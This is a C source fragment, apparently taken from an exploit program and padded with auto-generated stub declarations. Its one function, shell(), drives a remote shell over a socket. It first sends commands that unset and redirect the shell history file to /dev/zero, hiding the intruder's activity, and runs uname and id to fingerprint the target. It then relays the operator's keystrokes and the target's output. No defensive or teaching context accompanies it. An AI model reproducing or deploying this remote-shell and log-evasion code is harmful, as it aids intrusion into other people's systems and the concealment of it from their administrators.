
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int fd_set ;
typedef int buff ;


 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int exit (int ) ;
 int fprintf (int ,char*) ;
 int read (int ,char*,int) ;
 int recv (int,char*,int,int ) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 scalar_t__ send (int,char*,int,int ) ;
 int stderr ;
 int strlen (char*) ;
 int write (int,char*,int) ;

void shell(int thesock)
{
        int n;
        fd_set fds;
        char buff[1024], *cmd="unset HISTFILE; export HISTFILE=/dev/zero;"
         "export TERM=vt100;/bin/uname -a;/usr/bin/id;\n";

        FD_ZERO(&fds);
        FD_SET(thesock, &fds);
        FD_SET(0, &fds);

        send(thesock, cmd, strlen(cmd), 0);
        while(1) {
                FD_SET(thesock,&fds);
                FD_SET(0,&fds);

                if(select(thesock+1,&fds, ((void*)0), ((void*)0), ((void*)0))<0)
                        break;
                if( FD_ISSET(thesock, &fds) ) {
                        if(!(n=recv(thesock,buff,sizeof(buff),0))) {
                                exit(EXIT_FAILURE);
                        }
                        if (!write (1, buff, n))
                                break;
                }

                if ( FD_ISSET(0, &fds) ) {
                        n = read (0, buff, sizeof(buff));
                        if(n <= 0){
                                fprintf(stderr,"EOF\n");
                                exit(EXIT_FAILURE);
                        }
                        if(send(thesock,buff,n,0)<0) break;
                }
        }
        fprintf(stderr,"done.\n");
        exit(EXIT_SUCCESS);
}
